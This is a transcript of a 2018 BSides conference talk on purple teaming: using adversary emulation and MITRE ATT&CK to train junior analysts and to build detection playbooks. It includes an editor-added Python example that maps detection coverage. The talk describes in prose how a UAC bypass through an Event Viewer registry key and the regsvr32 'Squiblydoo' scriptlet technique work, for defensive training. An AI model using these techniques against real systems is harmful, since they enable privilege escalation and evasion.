
BSidesAugusta 2018 - Joseph Pilkington - Purple Reign: Elevate Your Analysts, Build Your Playbook

BSides Augusta · 47:30 · 124 views · Published 2018-11
About this talk
Joe Pilkington (@_Pilk_) Purple teaming is all the rage right now and has proven to be a very effective mechanism for building and strengthening defenses. While purple teaming generally involves the emulation of adversary techniques to develop detection techniques and analytics to counter them, purple teaming can provide teams so much more. I’ll address the much broader benefits purple teaming provides teams, including its role in analyst development, and developing living playbooks through updated information on attack trends and emerging threats. Purple teaming is a vastly underutilized approach that can augment capabilities, defenses, and teamwork without requiring a ton of external resources. In addition to the advanced detection benefits, purple teaming also helps analysts better understand attack trends and emerging threats. Analysts who participate in purple team exercises, and leverage a framework such as MITRE, are more likely to develop a better understanding of techniques and be more prepared to identify them during regular threat detection workflows. In many ways, this epitomizes the notion of “train how you fight”, and prepares analysts for a range of scenarios because they have already experienced them. Second, purple teaming helps build a living playbook that evolves in sync with the changing threats. Through purple teaming, the team gains a better understanding of the manual analytic processes needed to identify some techniques, as opposed to the automated detections that need to be triaged when they are triggered. Finally, lower tier analysts often are not involved in purple teaming, and so teams miss out on a great opportunity to develop these analysts within a collaborative and information-rich environment. Each of these areas will be discussed in detail, along with some real-world examples, to demonstrate the broad benefits of purple teaming well beyond building new detections.
Transcript [en]

could've been

rookie mic mistakes all apologies alright I'll go ahead and continue so back to the saying so you know hopefully I can identify some things that you know that maybe you even if you are as an organization or utilizing purple team that you're missing a little bit out of maybe some additional benefits that you can get for purple teaming in your environment or as an organization and answer some more things we can do with it to improve our team's workflows build a playbook for your team's to utilize during live ops so what is purple teaming right first I will start by kind of defining give you a little background of you know traditionally what purple teaming has been made up of and and how

it's being done so you know purple teaming is done by emulating a technique or a series of given techniques in a controlled environment what that does is allows the team to kind of observe those techniques actually be able to write a detection for that technique or identify a gap where maybe maybe I don't have enough data being collected to capture and observe and write a detection or an analytic for this technique but essentially it's complete transparency right it is not blue versus red at all there's not pitted against each other it's essentially either you know a person or persons going through both of those functions emulating that technique as if you were a red teamer but at the

same time knowing exactly what's coming across the wire so that you can observe it as a blue team or you know and then have the opportunity to better detect that technique in the future so purple teaming is not overseeing a red vs. blue exercise so you know I did research as I'm going into this talk kind of making sure I'm not a crazy person that what I think about purple team and how it exists and I did see a few times reference like you know you get the definition of red blue and purple teams and one of the things I saw everyone saw an article you know as the term mention of purple team just

facilitating a good exercise of red versus blue and that's not really a purple teaming at all purple teaming removes that competition factor and really just combines those teams into making them one unit that's just meant to you know collaborate better write better detections and you currently have give yourself more coverage of these techniques than you currently have or maybe identify gaps where you're not able to have that coverage so yeah not necessarily I'm not facilitating a red versus blue we have white cell and things like that that serve that purpose in an exercise environment so just quick comparison you know Red Team obviously acting as the adversary their role you know is to achieve

actions on objectives and should be to create training for blue right so accurately emulate some kind of threats you know and try and be Blue Team Red Team always attempting to evade blue you know it's kind of I want to win I don't want to lose kind of thing so blue team traditionally the defenders in that equation they're gonna you know observe report on those techniques that they've seen and then they're gonna you know take action whatever the exercise outlines for what you're supposed to do when you observe that red activity but those teams are pitted against each other and that you know effort of I'm you know I'm trying to bypass you or I'm

trying to stop everything you do or whatever it's kind of what purple teaming removes by like I said combining those teams into one unit one function right so you can either be you know purple team you can be the person on keyboard that emulates the technique and the one on the other side of the keyboard that's helping write that detection right so it just removes that competition factor it really allows you to thrive and getting to see everything that you've done on the environment as a red teamer or just being able to see that technique in full as a blue teamer because you fully expect it to come at you right like you know what techniques

being emulated it's been identified that these are the techniques you're gonna cover in a session or an activity or anything like that so how is purple teaming done one really really important step purple teaming is you need to choose a framework so and the reason I say that is because you need to have that list of techniques that you as a purple team need to be able to emulate all right you need to be able to decide whether you can detect it how you detect it or where those gaps are and so to have those techniques identified somewhere we would utilize a framework for that so we use MITRE ATT&CK I think it's the most you know cumbersome

framework that we have out there that fully accurate accurately defines all the different techniques that are possible from an adversary away from initial access you know to exfiltration so MITRE has over like 200 techniques so obviously this is not something you're choosing a framework and you're gonna go sit down and in one session you're gonna think that you're gonna be able to emulate and then write detection for all those techniques or write analytics for those techniques if it's something you're needing to hunt for but then at the same time it's something you can break up into different sessions and over time kind of achieve you know mapping out the entire matrix and what your capabilities are against those

techniques so how do we emulate those techniques so there's a lot of open source tools out there right so there's PowerShell Empire and Pupy and Koadic all these things have been created that really make it easy to facilitate you know you emulate an adversary it's something red teams use often now obviously there's paid tools out there as well it can do all this but just list some open source ones they're the easy to grab really easy to use but they are more manual right so then as you can see on that next bullet there's actually been a lot of development more recently on automating that Red Team side of it which it's really really helpful in an

organization that's trying to cover a lot of technique so just say a small organization may not have the same kind of manpower or time to dedicate so you can use those frameworks to them fully automate at least the majority of those attack techniques right so we got an example like Uber's Metta project you know MITRE's CALDERA Red Canary's Atomic Red Team and then Endgame's Red Team Automation tool so they all offer something a little bit different you know some of these are say like Red Team Automation and the Atomic Red Team tools are basically just sets of scripts and instructions on how to emulate these techniques in an environment whereas the other two may come with a VM or a

set VMs and scripts that you actually stand up in environment and then in that environment these techniques are emulated but essentially what that allows you to do is instead of having to manually one-by-one figure out how to you know kick off that technique within one of the manual tools like an Empire or Koadic or anything like that you actually have the ability to easily script those techniques just so you're able to observe you know what they did on an endpoint able to try and write that detection or that analytic that you'll need to be able to find this in the wild so an important part of a purple teaming is making this a cyclical

process right so it's not something where it's throwing everything against the wall and see what sticks it's something that you need to be able to evaluate and measure success over time so an example of that would be you know I we did you know 20 technique first session that we ever did and and then maybe we don't ever get back to those 20 techniques until we've you know done enough sessions to kind of cover every technique on the MITRE ATT&CK matrix right but then when we do get back to that set of 20 and then we're kind of trying to either you know revamp any current detections we have maybe a techniques been modified but it's kind

of close to how existed before you know a new binary is also found to be used to emulate that technique or whatever in the wild what you should be able to do is measure your success and have you improved in your ability to detect that technique over time right so have I you know maybe when I very first started this I kind of had enough data to where I could hunt for we'll say some kind of privilege escalation technique but then over time what you're able to do is say hey you know what you know this next round a purple team we actually found out how we could automate some of that and we actually have an alert now in this

process and or when this privilege escalation technique is seen in our environment or something that so that you're improving on that process over time right so just a little map of kind of what you know like what this should look like right so the first time you're going in that purple team exercise your concentration is just on writing detections and analytics like I said so whether it's I can fully automate this and create an alert from my analyst in our network or hey you know what we have the data to hunt for this so I can write an analytic that helps us you know carve out some of that data that we're able to collect in our environment and still

identify didn't identify just more in a proactive way right that's still a way to detect that threat as long as you do in those proactive measures so as you're writing those detections and analytics you know the next step would be you need to implement those into ops and then what's going to happen when you implement them into ops is you're going to have some that are probably really successful and some that are really terrible and how do you measure that probably by false positives and false negatives right so false positives being very easy to identify you know I created this the automated detection technique for this new hotness you know technique that was just released a few weeks ago but then when I

find in the process is that maybe it closely aligns with some kind of administrative action or something on my network to where it generates a ton of false positive alerts right like that obvious action that should be refined and so you should take that back to testing so false negatives are obviously way harder to identify but you will stumble upon in your environment where you know maybe you've identified an attack of some sort and then as you're kind of broadening correlating data about that attack you find that at one part you know they use that privilege escalation technique that you thought you wrote a detection for or that you ran that hunt for and you didn't

identify right so why didn't you identify it it'll be a false negative something where you can again kind of go to that next step where you take those those detections and analytics that you've written and refine them and then re-implement and then as soon as you know if you're kind of working through that process of refine/re-implement then you're going back to writing new detections and new analytics and the reason you always circle back around to writing new is because things are always changing right like the adversary is trying to stay one step ahead of you so the adversary as soon as you know there's a good set of detections out there for a specific technique they're

gonna modify it just a little bit and again in the keynote this morning they talked a little bit about this right like all I have to do is modify something if you're identifying a string of some sort that's a pretty easy change for an attacker to make right so you have to make sure that you're going through those constant refinement of those analytics and then working them back into your daily workflows so who are these purple teamers so it's kind of really bringing from one of my main points in today's talk so currently at least in the organization organizations that I've seen and then even in the research that I did you know kind of

lead enough to want to talk about this senior security engineers R&D guys senior you know Tier three analysts right what you're not seeing here are junior analysts or at least not a lot they're rarely involved or have a very minor role in purple teaming usually if any role at all right so what I've seen a lot of organizations is that tier 1 or tier 2 guy is maybe they're doing some investigating they're triaging alerts but then when we step over and we branch into actually leveraging these purple team techniques it's a couple of the more skilled guys in the shop that are going through that process fully on their own you know emulating techniques writing detections

kind of working that into the daily ops workflow and junior analysts kind of see almost none of that other than a new detection when it pops up right but what that does is kind of removes the ability for that junior analyst to understand that technique as well as that senior analyst uh so obviously a senior analyst has seen more that's why they should be running that exercise for sure they should be in charge of how that's going right but having those junior analysts involved is going to drastically drastically increase their you know ability to identify these techniques in the wild and I'm speaking from experience there so how is this being used currently in organization so it's

not being used by all organizations obviously you know it's either teams haven't been exposed to it enough you know or they don't maybe see that it has enough value to kind of be something that they work into their normal flow you know you feel like the red team blue team stuff they do or the penetration test they do or whatever exercise that they do as a team are more beneficial than they think purple teaming are or maybe you know they just under exposed to it not aware of really benefits it'll offer the two main functions that I see it for purple team is used is either you know I I just want to take my current

toolset that I have say I have Sysmon I have Security Onion I have some tools you know in my environment this is what makes up my toolset and I just need to throw some techniques to see what would this look like in my given toolset how would I detect it in security I mean how would I detect it in you know with Sysmon logging or anything like that right so that's what it's functions that can be really really valuable to an analyst especially if an analyst is new to that tool set right just seeing what that analyst should expect to see when that attack maybe comes across the wire but more what it's used for and this is

really the power in it is used for writing those advanced detections and analytics so not necessarily toolset specific you're just trying to emulate a technique in a controlled environment where you can collect as much data as possible about that technique and it gives you the ability to write as good of a detection as you possibly can right in doing that you will likely identify gaps in your coverage right you'll say like I threw this technique and we saw one kind of minor artifact was not something you could accurately identify this with and that kind of helps you identify those gaps in coverage so that's mainly what it's used for is the latter to you know help you observe

everything as that technique comes across the wire right that advanced you know a detection or analytic so purple teaming is not new this has been around for a while so funny that he mentioned it this morning as obviously I didn't do slides after this morning but Dave Kennedy our speaker our keynote speaker he talked about this back at Nanak on like 2014 and during right as he's leading in that talk about purple teaming he's saying you know hey this isn't new to him at that time either I like he had heard several other people talking about purple teaming at the time and it just hasn't really caught on as far as like enough buy-in for people really finding

the value in it to replace the traditional red versus blue and stuff that most organizations still go through and there's still a function for red versus blue I'm not saying that there's not I just feel like purple teaming has additional benefits and kind of some equivalent and some trade-offs as well so again this is not new some things have definitely changed since you know probably the talk back at Nanak on when Dave talked about it or when purple teaming first came out one of the things that's changed a lot is attack frameworks like how much attack frameworks have been built up that is an extremely useful tool right because without an attack framework to utilize saying these are the deck these are the

techniques that I have to identify or that I have to map my capabilities against then really all it is is a free-for-all of you choosing what you see either in you know malware research articles anything like that as what is an actual technique in the wild you categorizing that as what you find important or what not and then those would be the techniques that you emulate right but you're always gonna miss something there so having something like MITRE we've got that complete ATT&CK matrix built out showing all those techniques really helps us map our capabilities to that a so like you know one-for-one mapping another thing that's really changed since then I think is experience

required to kind of do the red piece of this right I talked about a little bit with the automation but I mean there's a difference in even just with one of the fully automated or with one of the manual tools getting into like a PowerShell Empire having to learn how to use the modules like oh I want to use this persistence module for a user land and whatever right like even that is a little bit you know on a new analyst would be kind of hard to do as opposed to and one of the automated frameworks I mentioned where you legitimately look at I want to run this technique I run you know Python persistence bla hit enter and that

technique is emulated on my end point where I'm deployed where I have my tool set where I'm monitoring for those behaviors right it's it's gotten a lot easier for us to do these purple team activities because of that effort so appreciates to all the the open-source community out there that's put all these tools together because they really really make it a lot easier for especially smaller teams to go through purple team exercise and be able to kind of scale that exercise and be able to you know launch that many techniques to where it really is a benefit to them and not something that's to have you have a workload so purple teaming can do even

more right so I've already hit on this a little bit but I think it has just a huge amount of benefit to a junior analyst so you could not take a junior analyst and say you are going to go do a purple teaming exercise on your own that's not a great idea right they may not know how to operate in that environment they may not know how to emulate the techniques even the automated tool at first they may not know all the data that they need to collect but that effort being guided by a senior analyst does that senior analyst is gonna be going through these purple team efforts anyway can be so so helpful so some obvious points and I'm

gonna go ahead and say anyway things are easier to identify when you've seen them before right I mean that's it's one of those muscle memory things right like it's if I've seen this and I've seen all the artifacts that could leave behind I probably have a better idea of how to react to it what other data to collect and all those things so train as you fight there's a reason train as you fight approach you know it's been so popular especially in the military but for so long right and that's because you're gonna fight like you train so in that red versus blue cyber knife fight environment we're like yes we get good training out of

but it's very much like not a cyber knife fight that you're gonna see in the real world it's maybe not as helpful to a junior analyst as saying hey you know outside of like did I win did I beat blue team can I just say that I successfully identified this technique and when I did I understood a few things you know like all the peripheral artifacts that technique might create and then also what this is gonna do is allow those operators to understand better like what that is involved with a MITRE ATT&CK matrix like where is this at in the kill chain where does this fit into an attackers like what does give an attacker on that environment right if

you're going through all these exercises it's just enabling those junior analysts to understand that a little bit better than they are when they're just told sit here in triage Alerts right so even if it's you know just semi kind of frequent running them through these purple team just has so many additional benefits for junior analyst I feel like it's also beneficial for red team so red teamers usually don't like to tell blue teamers what they're gonna do before they do it it's not practice that's used very much but it's extremely beneficial red teamers as well so I've been talking about this from a complete blue perspective and a lot of this talk is on the blue side right like on the

traditional defender side but it can be really really helpful for you know that attacker to see hey when I throw this technique it actually creates this artifact that I never knew it created before it maybe if I alter that technique just a little bit and I improve on my own techniques and it's gonna only challenge then blue or during your purple team activities for you to write a better detection for it right so and you get to see those kinds of things as a red teamer because of the fact that you're also getting to kind of peek in on the blue side where you usually don't see as much you usually hit that button and then you either get your call back

or you don't I kind of figure out where to go from there right like did it did it stick against the wall or not but being able to actually say okay I got my call back but then I also see all this additional recorded behavior that I never really understood them it happen in the background before that can be huge for a red teamer so another thing is tools so I'm not saying don't use tools right like red team tools are amazing so they allow us to not have to carry such a heavy burden of remembering every single thing like and they also make it much much more manageable to scale a red team engagement right because you can manage

host so much easier inside a red team tool where you can kind of collaborate list those hosts out see what you have as far as permissions on how somebody like they serve a good purpose but what tools sometimes do is force those red teamers into that mindset of like I just have to point click I guess that easy right like I can just put in the IP that I know I'm supposed to be going after here point-and-click instead of like actually fully understanding what's going on in the background right so again not saying don't use tools but then you know just insight like this is really helpful to understanding what those tools are doing you hit enter so

it's also beneficial to the blue team to have a red teamer there you know blue team can do this all on their own they can play red as well it's gonna be really beneficial obviously to sit right next to a red teamer who said no I've done this technique before there's a few different ways to do it we can try them all see how your detection fits against them all modify if we need to and then test again right as opposed to like as the blue teamer I'm probably gonna say I'm just gonna try this one technique that I have right here because I know I can emulate it once right so just very

very beneficial for both parties with red team being involved all right so real-world examples so one of the things that I would like to do I'm gonna do a little bit of my giveaway here but the kind of purpose of these is to be you know look at it from a junior analyst perspective we're gonna look at maybe I get an alert what data would I get with that alert and then what am I kind of missing there and how maybe I wouldn't be missing out on that data if I understand the technique I understand maybe this additional query I need to run what data I need to correlate this that right but we'll work through and

I'll do some giveaways as we're going through these slides so right we detect a technique so what right I have an alert for UAC bypass so what does that mean right like I'm gonna get some kind of alert data for some I'm guessing binary that attempted or successfully execute a UAC bypass more than likely does everybody know UAC user account control and trying to bypass user account control here okay so alert data this is not like specific to a certain platform at all or anything this is just some generalized what I would get for alert data in in a lot of tools this is mostly what you'll see right you're gonna get a process name process path PID parent process

name maybe some command-line arguments signer if you're collecting that kind of stuff on a binary but so what right like if I I'm a tier one analyst and I've not gotten time or I've not gotten that exposure to say the MITRE ATT&CK or really getting to dive into these techniques at all what does this mean to me I can quick Google UAC bypass like okay cool this is a you know it's a privilege escalation techniques helpful attackers trying to escalate privilege but still what now right like what is my next step as a junior analyst if I'm seeing a technique in the wild that I've never gotten to see before so is Event Viewer malicious like Event

Viewer is built-in Windows process right it's like so is Event Viewer malicious because the parent process like that's where that came from launched what looks to be Mimikatz as a junior analyst I can kind understand that looks like Mimikatz to me does that make Event Viewer malicious let's just know so can anyone tell me what the technique ID is the MITRE ATT&CK technique ID for UAC bypass hold on this is for a wireless adapter Google is fine you can google it I got a few things to give away so I'm asking a few questions so you know what tell me what the MITRE ATT&CK technique ID is for a UAC bypass stop with the t34 numbers yep

one zero eight eight all right thank you very much perfect hey Google's our friend right I mean I wouldn't expect anyone to I have fully memorized the ATT&CK matrix I'm sure somebody has done it I have not okay so MITRE ATT&CK technique T1088 can anyone tell me is anyone familiar with that technique like a show of hands maybe okay so if I'm emulating that attack technique or if I'm actually executing the technique in the wild can you want to tell me what has to be done before spawning event viewer that's going to actually allow you to elevate privileges and bypass UAC guesses are fine too nope not rundll so it's gonna be the addition or modification of something on

the endpoint modification of the Windows no starts with an R registry all right yeah so exactly right so it's modification in the Windows registry so it's actually specifically gonna be a modification to a registry key a modification to the registry key containing that mscfile shell open command so can be HKEY_CURRENT_USER it could be a couple different hives right but so essentially you can actually write looking for the modification of this registry key for containing the mscfile shell open command and you can actually see if we're collecting like just this my I'm collecting registry events right you can actually see now this registry event that exists and you can see process name looks like it's

modified by PowerShell some kind of you know encoded command off PowerShell actually had made that registry modification right so without going through this specific and I'm putting you guys on the spot cuz obviously you guys didn't go through this exact technique yesterday if you've purple team did at all but without going through that purple team activity looking for this technique right like how would I know that how would I so you know if I see that alert do I think you know do I do process lineage on Event Viewer because it can come from something other than the process that actually detonated Event Viewer that does not matter at all you know the registry key could be added

by a completely different parent process then calls Event Viewer and spawn this technique so you know without knowing that okay welcome to confirm this I should probably go see what file modified that registry key right and in doing so you'll be able to find out okay it's PowerShell so that gives you as an analyst a little bit better ability to go in and triage this alert hopefully this makes it sense several I'll give you another example here so I'm gonna have another alert right so I have an alert for regsvr32 scriptlet execution so Squiblydoo hopefully all familiar this is the fun one by Casey Smith or subTee with this example so

alright again we're gonna get alert data so I'm gonna get process name PID path command line I can write a detection purely basically off of this command line even though you have to worry about some string variables stuff that can change but so can anyone tell me the MITRE ATT&CK technique ID for regsvr32 for the practical packet analysis sorry hold on you said it first right yep here can you I'm gonna that's a so it's a long walk thanks alright so yes it's t1 107 all right now more advanced hopefully you're all on the MITRE ATT&CK matrix page for the technique ID and ready to help me answer this next question right now

right like we're all there ok perfect we're purple teaming together okay kind of so what you know so what this technique is essentially doing is regsvr32 is loading this scrobj.dll and allowing to execute that COM scriptlet which is essentially just an XML file so whatever code is being executed actually lives in that file can anyone tell me the file path where I could go grab that within a short time frame and if after this alert

Temporary Internet Files, perfect, exactly. So same thing you would see if you actually had, you know, Internet Explorer open and you clicked on a binary and instead of clicking Save you clicked Run: that file is obviously temporarily saved to a location so that it can be executed, right? So same thing, you'll actually see it saved in Temporary Internet Files. So right, what else, what else do we need? I need that file, probably, because of the fact that this technique can be, you know, utilized to write code into memory. So if I don't have anything after this point that's actually on disk that can help me either confirm or deny what happened next, you know, how do I

confirm this was malicious? Where do I see that code at? You could go grab the file right here, so a quick file search, or if you're collecting file events, right, being able to search for that file by file name and knowing that it's in the path for Temporary Internet Files. You don't need to know user-specific or anything like that, you can quickly pull that data back. You probably likely carved it out in Bro logs or something if you're collecting these types of files. So again I can take that and I could actually see, okay, so this is a small section of what that code would look like, right? But then I can say, okay, well it actually did

execute PowerShell. Temporarily, I can go back and maybe look for this event, maybe this event didn't alert, but I can go back, do lineage on this event, kind of look for what came before, what came after. So without again seeing that technique and seeing like all of its behaviors, knowing the files that it drops, or the example before, the registry key that it creates, it's kind of hard, really hard for a junior analyst to know what do I do next when I get this alert, right? And so purple teaming can really, really, really drastically help them in understanding some of these things. So again it's not going to be like I know everything because I fully executed a

purple team against the MITRE ATT&CK matrix, but it does give you kind of that muscle memory in responding or reacting to some of these techniques when you actually see them in the wild. So what can we, and I say we as a community, what can we do differently, right? So involve analysts of all levels. You know, pros to this obviously, or that, again I've mentioned muscle memory a few times, but that reaction time for an analyst and the ability to either know what to do next, or even be able to respond to this if it's something you need to take, you know, immediate remediation actions on right away, is going to be much better the second or

third time than it was the first time, right? So, you know, help your analysts in understanding what data do I need to correlate, right? Like I said before, what registry key was dropped or modified, or what file was created, or, you know, what user logon event would have had to take place prior to this happening. So then cons, you know, in talking about this with a few fellow analysts, some analysts that are much senior to yours truly, I kind of got: everything I'm talking about here with muscle memory and all that stuff, it's kind of saving time, right, in the long run, you know, the time that it takes for your analyst to react

to a technique, the time that it takes you to do this or that. And then the point that was brought up was, you know, okay, the time that your senior analysts are then having to invest in, you know, facilitating these exercises with junior analysts, that they might be losing, is time that's spent writing detection techniques on their own, right? Like they're the experienced ones, they're the ones that could very likely just do this on their own without involving junior analysts at all. My argument to that would be, you're probably right, in the beginning you're gonna lose a little bit of time as a senior analyst, and maybe the frequency that you're able to, you know, like maybe emulate some techniques in a

given purple teaming activity. But over time all you're doing is building more purple teamers, alright? So over time you will catch up that speed and probably eventually surpass it, because you've created a much larger purple team, right, that has the ability to do this, and maybe they are working on refining tactics and not always doing it on creating new, but at the same time, more people, the quicker that's gonna go as well. So I really think you can utilize purple teaming to elevate your analysts, right? Part of the title of my talk. I think that, you know, you have to help your analysts grow, right? Like you have to facilitate an environment where you

allow them to engage in these activities and kind of alleviate that "so what," or, you know, that mindset, right, of an analyst. Like I see this in training all the time. I said, well, I enjoy myself, I do a lot of training, and so that's one of the major things that I see is, uh, you know, I teach someone how to see something, you know, specific to our product or not, and the next thing I get is, why do I care, right? And so you can kind of alleviate that by giving them the background on the technique that you're trying to teach them to identify in the wild. So you can elevate your workforce, right?

You're gonna give them the tools and experience by including them in this, and then, you know, you're just essentially getting them to look beyond the alert, give them the ability to know, you know, what's my next step, what do I do to correlate data, what's, you know, what do I do to triage. So we can also do more, I feel like, in the daily operations. Purple teaming can help us with daily ops, you know, testing these techniques. I said this a little bit earlier: you're gonna identify either holes that you have in coverage, or you might also identify things that you can, you know, fully automate, or things that are harder for you to catch but you can

do them in hunting, you know, and that can help you build what is known as a heat map, which in turn can help you build your playbook. So in building your own playbook, you know, emulation of these techniques can help you build that heat map, and I'm just piggybacking off of Roberto Rodriguez. I don't know if you guys have read, if you've not read "How Hot Is Your Hunt Team?", great article about mapping your hunt team's capabilities to a framework such as MITRE, right? So we can do the same kind of thing here, and I'm, you know, a little bit different than Roberto when he talks about it, but, you know, I'm primarily focusing on,

when I write a detection or an analytic, do I have something that's fully automated, as in it's gonna alert, and when it alerts I can take the response action on that alert? Or do I have something that maybe has a little bit of alert functionality, but maybe we're missing some data to always know I have a true positive there? Do I have no detection functionality at all, but I do collect enough data to where I can hunt for it? So a lot of times this might be the case with things you might try and create a detection for and they have false positives, like the data is there but the detection you write has too high of a

false positive rate. You may just have to do that as a proactive search. And then, either, you know, maybe partial data, or, you know, like I think I can identify that technique but I really may not have enough data in general to fully guarantee that that's what you're seeing when you see it, or just I don't have enough data, you know, I don't have a tool that even fits that mold, or this technique, what we're trying to identify, wouldn't have that capability. So when you map those out, now this is just a random example of what that could look like on the MITRE ATT&CK matrix, you know, you've mapped those, say okay, for these techniques I can actually, I

have a fully automated detection in which I can rely on an alert to, you know, tell me if this is happening in my environment, versus, you know, what's more manual, or what am I not able to do at all in my environment. And it's very, very important to understand where those gaps are. So identifying strengths and weaknesses, you know, it's going to help you build that ops playbook. So ops can't be like telling your analyst just to go find what's bad on the network, right? There should be a given set of, you know, instructions or, you know, like tasks that an analyst at each level has to complete each day, whether that's

triaging alerts, or hunting for something, or, you know, like collecting more data so that you can dig through it a lot later on. Those tasks can essentially be mapped out to identify, like: review and triage automated detections, hunt for techniques, figure out a way to collect that additional data. So for these first two specifically there should be prioritization of efforts, right? So when you're looking at alerts that I'm triaging, or, you know, techniques that I'm hunting for, efforts should be prioritized. So different techniques have different severities, right? So it might be where an attacker is at in the, you know, attack lifecycle. Maybe it's more severe to me if an

attacker is closer to exfil than it is if it's like the first execution event I've seen, because it's several actions-on-objectives deep at that point, right? Or maybe it's more, you know, more severe to me, sorry, if it's an execution event than it is a discovery, because I know execution means, hey, probably pretty close to initial access, malicious code getting executed in some way, shape or form on my box, whereas discovery means, you know, that attacker is basically doing some situational awareness, you know, maybe trying to move laterally or trying to discover resources they have access to, right? But either way, like, this is a determination that's made up of what's important on

your team and how you categorize that. But it's taking what's important for you as techniques to identify, correlating that with what you do well, what you don't do well, and that should help you build your priority list, right? So if there's something that's very important to me and it's something that I have to do manually, that manual piece should be built into one of your higher-tiered analysts' playbook every single day, right, to give you that, you know, like, utmost confidence in identifying those techniques. So let's, so in a, you know, an ideal world where I have a strongly enough manned team that I can, you know, say I could treat every technique as equal, you make that prioritization on

your own. In less mature SOCs or teams you might actually need the ability to have that driven by intelligence, and so when I say that I'll bring up CAR, which is the Cyber Analytics Report, oh sorry, Repository, Exploration Tool. So I'm just, as an example here, you know, I can use this to kind of map out, let's say I'm a financial institution and I want to look at threats like Lazarus Group, which mainly targets financial institutions, and what that'll do is actually map out, okay, these are the main techniques used by that adversary. And there's more than one that you would have to do this for, but just saying you can use, you know, especially for an

undermanned team, where it's kind of hard to treat every technique as equal, you can use this kind of intelligence-driven data to help you prioritize what you should be, you know, treating as important in your environment, right?
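The heat map and daily playbook prioritization the speaker describes, written out as an added example (this is editor-added code, not the speaker's): each technique carries one of the four coverage levels from the talk (automated, partial, hunt-only, no data), the team assigns a severity per tactic, and an optional intelligence-driven set of adversary techniques boosts the priority score that orders the manual hunt tasks. The technique IDs are 2018-era ATT&CK IDs (the ones named in the talk plus a few others); the coverage values, tactic severities and the adversary technique set are constructed assumptions, not measurements of any real team or group.

```python
"""ATT&CK coverage heat map and daily playbook prioritization
(added example, not the speaker's code)."""

# Coverage levels from the talk. The weight is how much manual effort the
# technique demands: automated detections are triaged when they fire,
# partial ones need confirmation, hunt-only ones need a proactive search,
# and "none" is a collection gap rather than a hunt task.
COVERAGE_WEIGHT = {"automated": 0.0, "partial": 0.5, "hunt": 1.0, "none": 1.5}

# Assumed tactic severities; the talk leaves this ordering to the team.
TACTIC_SEVERITY = {
    "Exfiltration": 5, "Execution": 4, "Lateral Movement": 4,
    "Persistence": 3, "Defense Evasion": 3, "Discovery": 2,
}

# Constructed inventory: technique ID -> (name, tactic, coverage).
# IDs are 2018-era ATT&CK IDs; the coverage values are assumptions.
INVENTORY = {
    "T1117": ("Regsvr32", "Defense Evasion", "automated"),
    "T1088": ("Bypass User Account Control", "Defense Evasion", "partial"),
    "T1047": ("Windows Management Instrumentation", "Execution", "hunt"),
    "T1087": ("Account Discovery", "Discovery", "hunt"),
    "T1048": ("Exfiltration Over Alternative Protocol", "Exfiltration", "none"),
    "T1086": ("PowerShell", "Execution", "partial"),
}

# Intelligence-driven input: techniques attributed to the adversary the
# team prioritizes (a constructed set, not a claim about any real group).
INTEL_TECHNIQUES = frozenset({"T1047", "T1086", "T1048"})


def priority(tid, inventory, intel=frozenset()):
    """Higher means hunt it earlier: manual effort x severity x intel boost."""
    _, tactic, coverage = inventory[tid]
    boost = 2 if tid in intel else 1
    return COVERAGE_WEIGHT[coverage] * TACTIC_SEVERITY[tactic] * boost


def heat_map(inventory):
    """Tactic -> {technique: coverage}: the cells you would color on the matrix."""
    grid = {}
    for tid, (_, tactic, coverage) in inventory.items():
        grid.setdefault(tactic, {})[tid] = coverage
    return grid


def render_heat_map(inventory):
    """Text rendering of the grid: # automated, + partial, ~ hunt-only, . no data."""
    marks = {"automated": "#", "partial": "+", "hunt": "~", "none": "."}
    rows = []
    for tactic, cells in heat_map(inventory).items():
        cells_text = " ".join(f"{marks[c]}{tid}" for tid, c in cells.items())
        rows.append(f"{tactic:<16} {cells_text}")
    return "\n".join(rows)


def build_playbook(inventory, intel=frozenset()):
    """Split the inventory into the three daily task types from the talk and
    order the manual hunts by priority, highest first (stable for ties)."""
    playbook = {"triage_alerts": [], "hunt_daily": [], "collect_data": []}
    for tid, (_, _, coverage) in inventory.items():
        if coverage == "automated":
            playbook["triage_alerts"].append(tid)
        elif coverage == "none":
            playbook["collect_data"].append(tid)
        else:
            playbook["hunt_daily"].append(tid)
    playbook["hunt_daily"].sort(key=lambda t: -priority(t, inventory, intel))
    return playbook


if __name__ == "__main__":
    print(render_heat_map(INVENTORY))
    print(build_playbook(INVENTORY, INTEL_TECHNIQUES))
```

Running it with and without the intel set shows the point the speaker makes about undermanned teams: the same inventory yields a different hunt order once adversary-specific techniques are weighted, while the automated and no-data buckets are unaffected.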

So, you know, I think that everyone here could benefit from either, you know, purple teaming, or maybe taking purple teaming efforts that you're doing and, you know, involving those junior analysts. So having that cyclical process like I talked about earlier to make sure that, you know, you keep pace with your adversary. Your adversary is always, always advancing their TTPs. They may not always use advanced TTPs if you don't force them to. If you have, you know, like, SMB open to the Internet, that's pretty easy for an adversary. But as you force adversaries to use more advanced techniques, they will create new ways to get into your environment and move laterally in your environment, to exfil

from your environment, or whatever that is, right? And so having that, like, process of going back through, reiterating through new techniques, writing new detections, makes sure that you're keeping pace. And MITRE does a great job of keeping that updated, and the community is really great, especially all the security researchers in this community, about, you know, sharing that stuff. Squiblydoo is a good example, the regsvr32 attack I showed, where, you know, subTee, hey, I found this, you know, this is what you're able to do with it, and then not very long after, APT32 using it in real-world attacks, like, all over. So really, really good, useful, you know, making sure they're

keeping up with those techniques as they get added. So, you know, through utilizing purple team, your teams are gonna get a, you know, your personnel, your analysts are gonna get a better understanding of things like the ATT&CK matrix, right? Like, what does this mean for an attacker if I'm in, you know, this stage of the lifecycle? What does this privilege escalation technique do for me? You know, is it hard to emulate, is it easier in a certain environment, any of those things. So, you know, they'll get a better understanding for those manual processes, of how hard it is, you know, to go through those detections, and then how to correlate data, right? So that's an important piece to me that I

think junior analysts take away from this more than anything, is: I've seen this attack before, I know when this happens, you know, what it does, and I can correlate that data that you might not be able to collect in every alert, right? Like, you can only put so much data in an alert to give to an analyst to show this is something that happened, and that analyst has to have some way to know how to go ahead and correlate those techniques, or sorry, correlate that to the technique that's been identified. So, you know, in closing here, so purple teaming is a practice that I think, you know, organizations of all sizes and all manpower should be at least attempting

to emulate, or attempting to act on doing these exercises inside your environments. It's gonna do nothing but benefit your junior analysts. There's a lot of, you know, it's really, really easy to get started. You know, you're gonna improve your analysts' abilities and your team's capabilities overall, as you not only build more capable analysts but better purple teamers who can do a better job of keeping up with those recent threats, right, and making sure that you have detections, you have analytics to identify all of those in the wild. And again, like, the last point I'll make again is it's very easy to get started with all of the open tooling and documentation, kind of guidance, that's

